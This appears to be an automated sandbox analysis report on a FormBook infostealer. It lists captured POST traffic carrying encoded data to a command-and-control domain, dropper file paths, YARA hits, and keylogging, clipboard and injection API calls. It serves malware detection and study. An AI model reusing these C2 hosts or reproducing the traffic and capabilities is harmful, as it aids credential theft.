                    Source: unknownHTTP traffic detected: POST /fm31/ HTTP/1.1Host: www.medicaresbasics.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.medicaresbasics.xyzReferer: http://www.medicaresbasics.xyz/fm31/Cache-Control: no-cacheContent-Length: 220Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)Data Raw: 41 32 6a 70 64 74 6c 3d 4f 73 6a 4f 38 76 30 37 62 30 54 6c 48 2f 5a 45 61 49 34 43 75 35 5a 4b 37 78 35 74 72 54 2f 73 77 30 48 77 71 79 62 72 71 65 64 38 6d 6e 4c 48 70 58 62 39 52 51 62 51 65 2f 6b 64 5a 4e 58 57 61 67 48 4a 39 41 35 78 38 69 72 36 6e 63 56 6f 69 72 74 4a 48 34 48 75 6a 58 52 79 6d 4d 7a 74 34 51 31 6d 42 75 4d 64 52 70 4d 43 68 35 73 77 6d 54 63 50 35 2f 6d 4a 69 32 43 4e 76 4b 6f 77 46 6b 54 75 57 57 67 59 45 46 59 50 70 2f 50 67 51 6c 41 72 58 77 33 4f 52 35 6c 56 75 74 64 5a 58 38 37 44 6c 37 58 35 41 61 4b 59 75 65 6a 48 67 65 62 6c 4c 72 6b 48 31 39 4b 76 62 79 32 41 6f 52 4c 66 59 57 4e 55 76 77 73 49 6e 38 2b 77 58 67 3d 3d Data Ascii: A2jpdtl=OsjO8v07b0TlH/ZEaI4Cu5ZK7x5trT/sw0Hwqybrqed8mnLHpXb9RQbQe/kdZNXWagHJ9A5x8ir6ncVoirtJH4HujXRymMzt4Q1mBuMdRpMCh5swmTcP5/mJi2CNvKowFkTuWWgYEFYPp/PgQlArXw3OR5lVutdZX87Dl7X5AaKYuejHgeblLrkH19Kvby2AoRLfYWNUvwsIn8+wXg==
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 20:07:48 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 20:07:50 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 20:07:53 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 20:07:56 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>
                    Source: LHSqcaLVnKQk.exe, 00000012.00000002.2542692952.0000000000BDA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.meliorahomes.net
                    Source: LHSqcaLVnKQk.exe, 00000012.00000002.2542692952.0000000000BDA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.meliorahomes.net/ir1u/
                    Source: mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: mobsync.exe, 0000000F.00000002.2540011755.0000000003128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: mobsync.exe, 0000000F.00000002.2540011755.0000000003128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                    Source: mobsync.exe, 0000000F.00000002.2540011755.0000000003128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: mobsync.exe, 0000000F.00000002.2540011755.0000000003128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                    Source: mobsync.exe, 0000000F.00000002.2540011755.0000000003128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: mobsync.exe, 0000000F.00000002.2540011755.0000000003128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                    Source: mobsync.exe, 0000000F.00000003.2069677116.0000000007F34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                    Source: mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C64164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00C64164
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C64164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00C64164
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_00164164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_00164164
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C63F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_00C63F66
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,5_2_00C5001C
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C7CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_00C7CABC
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0017CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,7_2_0017CABC

                    E-Banking Fraud

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.1903592884.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1865888843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2542862112.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2539169522.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1866274601.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1866670350.0000000004150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2543006411.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.2542692952.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2542858222.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                    System Summary

                    barindex
                    Binary is likely a compiled AutoIt script file
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: This is a third-party compiled AutoIt script.5_2_00BF3B3A
                    Source: 25Lz840Dmh.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: 25Lz840Dmh.exe, 00000005.00000000.1274751332.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6b97aa45-e
                    Source: 25Lz840Dmh.exe, 00000005.00000000.1274751332.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_6457b364-d
                    Source: 25Lz840Dmh.exe, 00000005.00000003.1287083806.0000000004013000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_735d0dcd-b
                    Source: 25Lz840Dmh.exe, 00000005.00000003.1287083806.0000000004013000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_30d3a38c-8
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: This is a third-party compiled AutoIt script.7_2_000F3B3A
                    Source: fricandeaus.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: fricandeaus.exe, 00000007.00000000.1289179428.00000000001A4000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0adb7632-9
                    Source: fricandeaus.exe, 00000007.00000000.1289179428.00000000001A4000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_5064ea85-2
                    Source: fricandeaus.exe, 0000000B.00000000.1427722985.00000000001A4000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_926df728-0
                    Source: fricandeaus.exe, 0000000B.00000000.1427722985.00000000001A4000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e18b9967-b
                    Source: 25Lz840Dmh.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ff9faf1e-8
                    Source: 25Lz840Dmh.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_5ffb1bf6-a
                    Source: fricandeaus.exe.5.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_dafcc579-e
                    Source: fricandeaus.exe.5.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_363806ae-0
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0042C613 NtClose,9_2_0042C613
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372B60 NtClose,LdrInitializeThunk,9_2_03372B60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03372DF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033735C0 NtCreateMutant,LdrInitializeThunk,9_2_033735C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03374340 NtSetContextThread,9_2_03374340
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03374650 NtSuspendThread,9_2_03374650
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372BA0 NtEnumerateValueKey,9_2_03372BA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372B80 NtQueryInformationFile,9_2_03372B80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372BF0 NtAllocateVirtualMemory,9_2_03372BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372BE0 NtQueryValueKey,9_2_03372BE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372AB0 NtWaitForSingleObject,9_2_03372AB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372AF0 NtWriteFile,9_2_03372AF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372AD0 NtReadFile,9_2_03372AD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372F30 NtCreateSection,9_2_03372F30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372F60 NtCreateProcessEx,9_2_03372F60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372FB0 NtResumeThread,9_2_03372FB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372FA0 NtQuerySection,9_2_03372FA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372F90 NtProtectVirtualMemory,9_2_03372F90
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372FE0 NtCreateFile,9_2_03372FE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372E30 NtWriteVirtualMemory,9_2_03372E30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372EA0 NtAdjustPrivilegesToken,9_2_03372EA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372E80 NtReadVirtualMemory,9_2_03372E80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372EE0 NtQueueApcThread,9_2_03372EE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372D30 NtUnmapViewOfSection,9_2_03372D30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372D10 NtMapViewOfSection,9_2_03372D10
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372D00 NtSetInformationFile,9_2_03372D00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372DB0 NtEnumerateKey,9_2_03372DB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372DD0 NtDelayExecution,9_2_03372DD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372C00 NtQueryInformationProcess,9_2_03372C00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372C70 NtFreeVirtualMemory,9_2_03372C70
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372C60 NtCreateKey,9_2_03372C60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372CA0 NtQueryInformationToken,9_2_03372CA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372CF0 NtOpenProcess,9_2_03372CF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372CC0 NtQueryVirtualMemory,9_2_03372CC0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03373010 NtOpenDirectoryObject,9_2_03373010
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03373090 NtSetValueKey,9_2_03373090
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033739B0 NtGetContextThread,9_2_033739B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03373D10 NtOpenProcessToken,9_2_03373D10
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03373D70 NtOpenThread,9_2_03373D70
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,5_2_00C5A1EF
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C48310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,5_2_00C48310
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C551BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_00C551BD
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001551BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,7_2_001551BD
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BFE6A05_2_00BFE6A0
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C1D9755_2_00C1D975
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BFFCE05_2_00BFFCE0
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C121C55_2_00C121C5
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C262D25_2_00C262D2
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C703DA5_2_00C703DA
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C2242E5_2_00C2242E
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C125FA5_2_00C125FA
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C066E15_2_00C066E1
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C4E6165_2_00C4E616
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C2878F5_2_00C2878F
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C588895_2_00C58889
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C268445_2_00C26844
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C708575_2_00C70857
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C088085_2_00C08808
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C1CB215_2_00C1CB21
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C26DB65_2_00C26DB6
